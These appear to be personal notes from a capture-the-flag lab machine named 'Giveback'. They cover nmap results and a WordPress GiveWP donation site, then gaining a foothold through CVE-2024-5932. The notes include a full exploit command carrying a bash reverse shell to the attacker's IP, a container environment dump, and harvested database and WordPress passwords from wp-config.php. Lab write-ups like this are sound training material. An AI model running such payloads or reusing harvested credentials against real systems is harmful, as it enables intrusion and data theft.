Giveback

NMAP

PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
6443/tcp  filtered sun-sr-https
10250/tcp filtered unknown
13013/tcp filtered unknown
30686/tcp open     unknown

asd

Foothold

• the website is configured using wordpress 6.8.1
• uses a givewp plugin to handle everything
• is a donation website.

  Team, as u know, we’re going to start this NFP soon.
  But we need to make it scalable and we need to use ‘new technologies’ – while saying goodbye to licensing that we can no longer afford.
  
  Once we have proper funding we’ll move out into EKS.
  
  Stay clean, stay focused-
  
  -babywyrm
  

• cve-2024-5932/8353
• start a nc listener on 1337

• givewp/bin/python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.67/1337 0>&1'"

• get the shell to find we are in a container.

  ETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
  WEB_SERVER_HTTP_PORT_NUMBER=8080
  WORDPRESS_RESET_DATA_PERMISSIONS=no
  KUBERNETES_SERVICE_PORT=443
  WORDPRESS_EMAIL=user@example.com
  WP_CLI_CONF_FILE=/opt/bitnami/wp-cli/conf/wp-cli.yml
  WORDPRESS_DATABASE_HOST=beta-vino-wp-mariadb
  MARIADB_PORT_NUMBER=3306
  MODULE=wordpress
  WORDPRESS_SMTP_FROM_NAME=FirstName LastName
  HOSTNAME=beta-vino-wp-wordpress-bcfdc9c79-2mh5q
  WORDPRESS_SMTP_PORT_NUMBER=
  BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
  WORDPRESS_EXTRA_CLI_ARGS=
  APACHE_BASE_DIR=/opt/bitnami/apache
  LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
  APACHE_VHOSTS_DIR=/opt/bitnami/apache/conf/vhosts
  WEB_SERVER_DEFAULT_HTTP_PORT_NUMBER=8080
  WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
  WORDPRESS_ENABLE_DATABASE_SSL=no
  WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
  APACHE_DAEMON_USER=daemon
  BITNAMI_ROOT_DIR=/opt/bitnami
  LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
  WORDPRESS_BASE_DIR=/opt/bitnami/wordpress
  WORDPRESS_SCHEME=http
  WORDPRESS_LOGGED_IN_SALT=
  BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
  WORDPRESS_DATA_TO_PERSIST=wp-config.php wp-content
  WORDPRESS_HTACCESS_OVERRIDE_NONE=no
  WORDPRESS_DATABASE_SSL_CERT_FILE=
  APACHE_HTTPS_PORT_NUMBER=8443
  PWD=/opt/bitnami/wordpress
  OS_FLAVOUR=debian-12
  WORDPRESS_SMTP_PROTOCOL=
  WORDPRESS_CONF_FILE=/opt/bitnami/wordpress/wp-config.php
  LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
  WP_CLI_BASE_DIR=/opt/bitnami/wp-cli
  WORDPRESS_VOLUME_DIR=/bitnami/wordpress
  WP_CLI_CONF_DIR=/opt/bitnami/wp-cli/conf
  APACHE_BIN_DIR=/opt/bitnami/apache/bin
  BETA_VINO_WP_MARIADB_SERVICE_PORT_MYSQL=3306
  WORDPRESS_PLUGINS=none
  WORDPRESS_FIRST_NAME=FirstName
  MARIADB_HOST=beta-vino-wp-mariadb
  WORDPRESS_EXTRA_WP_CONFIG_CONTENT=
  WORDPRESS_MULTISITE_ENABLE_NIP_IO_REDIRECTION=no
  WORDPRESS_DATABASE_USER=bn_wordpress
  PHP_DEFAULT_UPLOAD_MAX_FILESIZE=80M
  WORDPRESS_AUTH_KEY=
  BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306
  WORDPRESS_MULTISITE_NETWORK_TYPE=subdomain
  APACHE_DEFAULT_CONF_DIR=/opt/bitnami/apache/conf.default
  WORDPRESS_MULTISITE_NETWORK_TYPE=subdomain
  APACHE_DEFAULT_CONF_DIR=/opt/bitnami/apache/conf.default
  WORDPRESS_DATABASE_SSL_KEY_FILE=
  WORDPRESS_LOGGED_IN_KEY=
  APACHE_CONF_DIR=/opt/bitnami/apache/conf
  HOME=/
  KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
  WEB_SERVER_DAEMON_GROUP=daemon
  PHP_DEFAULT_POST_MAX_SIZE=80M
  WORDPRESS_ENABLE_HTTPS=no
  BETA_VINO_WP_WORDPRESS_SERVICE_PORT=80
  BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
  WORDPRESS_TABLE_PREFIX=wp_
  WORDPRESS_DATABASE_PORT_NUMBER=3306
  WORDPRESS_DATABASE_NAME=bitnami_wordpress
  LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
  APACHE_HTTP_PORT_NUMBER=8080
  WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
  WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80
  WP_CLI_DAEMON_GROUP=daemon
  APACHE_DEFAULT_HTTP_PORT_NUMBER=8080
  BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306
  WORDPRESS_MULTISITE_FILEUPLOAD_MAXK=81920
  WORDPRESS_AUTO_UPDATE_LEVEL=none
  BITNAMI_DEBUG=false
  LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
  LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
  WORDPRESS_USERNAME=user
  BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80
  WORDPRESS_ENABLE_XML_RPC=no
  WORDPRESS_BLOG_NAME=User's Blog!
  WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242
  APACHE_PID_FILE=/opt/bitnami/apache/var/run/httpd.pid
  WORDPRESS_AUTH_SALT=
  APACHE_LOGS_DIR=/opt/bitnami/apache/logs
  WORDPRESS_EXTRA_INSTALL_ARGS=
  BETA_VINO_WP_MARIADB_PORT_3306_TCP_PORT=3306
  APACHE_DAEMON_GROUP=daemon
  WORDPRESS_NONCE_KEY=
  WEB_SERVER_HTTPS_PORT_NUMBER=8443
  WORDPRESS_SMTP_HOST=
  WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
  WORDPRESS_NONCE_SALT=
  APACHE_DEFAULT_HTTPS_PORT_NUMBER=8443
  APACHE_CONF_FILE=/opt/bitnami/apache/conf/httpd.conf
  WORDPRESS_MULTISITE_EXTERNAL_HTTP_PORT_NUMBER=80
  BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
  WEB_SERVER_DEFAULT_HTTPS_PORT_NUMBER=8443
  WP_NGINX_SERVICE_SERVICE_PORT=80
  WORDPRESS_LAST_NAME=LastName
  WP_NGINX_SERVICE_PORT_80_TCP_PORT=80
  WORDPRESS_ENABLE_MULTISITE=no
  WORDPRESS_SKIP_BOOTSTRAP=no
  BITNAMI_VOLUME_DIR=/bitnami
  BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82
  BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PORT=80
  KUBERNETES_PORT_443_TCP_PROTO=tcp
  BITNAMI_APP_NAME=wordpress
  WORDPRESS_DATABASE_PASSWORD=sW5sp4spa3u7RLyetrekE4oS
  APACHE_HTDOCS_DIR=/opt/bitnami/apache/htdocs
  BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
  WEB_SERVER_GROUP=daemon
  WORDPRESS_PASSWORD=O8F7KR5zGi
  KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
  APACHE_HTACCESS_DIR=/opt/bitnami/apache/conf/vhosts/htaccess
  WORDPRESS_DEFAULT_DATABASE_HOST=mariadb
  WORDPRESS_SECURE_AUTH_KEY=
  BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
  APACHE_TMP_DIR=/opt/bitnami/apache/var/run
  APP_VERSION=6.8.1
  BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204
  ALLOW_EMPTY_PASSWORD=yes
  WP_CLI_DAEMON_USER=daemon
  BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
  KUBERNETES_SERVICE_HOST=10.43.0.1
  KUBERNETES_PORT=tcp://10.43.0.1:443
  KUBERNETES_PORT_443_TCP_PORT=443
  WP_CLI_BIN_DIR=/opt/bitnami/wp-cli/bin
  WORDPRESS_VERIFY_DATABASE_SSL=yes
  OS_NAME=linux
  BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PROTO=tcp
  APACHE_SERVER_TOKENS=Prod
  PATH=/opt/bitnami/apache/bin:/opt/bitnami/common/bin:/opt/bitnami/common/bin:/opt/bitnami/mysql/bin:/opt/bitnami/common/bin:/opt/bitnami/php/bin:/opt/bitnami/php/sbin:/opt/bitnami/apache/bin:/opt/bitnami/mysql/bin:/opt/bitnami/wp-cli/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
  WORDPRESS_ENABLE_HTACCESS_PERSISTENCE=no
  WORDPRESS_ENABLE_REVERSE_PROXY=no
  LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
  WORDPRESS_SMTP_USER=
  WEB_SERVER_TYPE=apache
  WORDPRESS_MULTISITE_HOST=
  PHP_DEFAULT_MEMORY_LIMIT=512M
  WORDPRESS_OVERRIDE_DATABASE_SETTINGS=no
  WORDPRESS_DATABASE_SSL_CA_FILE=
  WEB_SERVER_DAEMON_USER=daemon
  OS_ARCH=amd64
  BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204
  BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
  _=/usr/bin/env
  OLDPWD=/opt/bitnami/wordpress/wp-admin
  

-

mariadb-root - sW5sp4syetre32828383kE4oSI
mariadb - sW5sp4spa3u7RLyetrekE4oSI
wordpress - `O8F7KR5zGi I have no name!`

• wp-config.php

  // ** Database settings - You can get this info from your web host ** //
  /** The name of the database for WordPress */
  define( 'DB_NAME', 'bitnami_wordpress' );
  
  /** Database username */
  define( 'DB_USER', 'bn_wordpress' );
  
  /** Database password */
  define( 'DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS' );
  
  /** Database hostname */
  define( 'DB_HOST', 'beta-vino-wp-mariadb:3306' );
  
  /** Database charset to use in creating database tables. */
  define( 'DB_CHARSET', 'utf8' );
  
  /** The database collate type. Don't change this if in doubt. */
  define( 'DB_COLLATE', '' );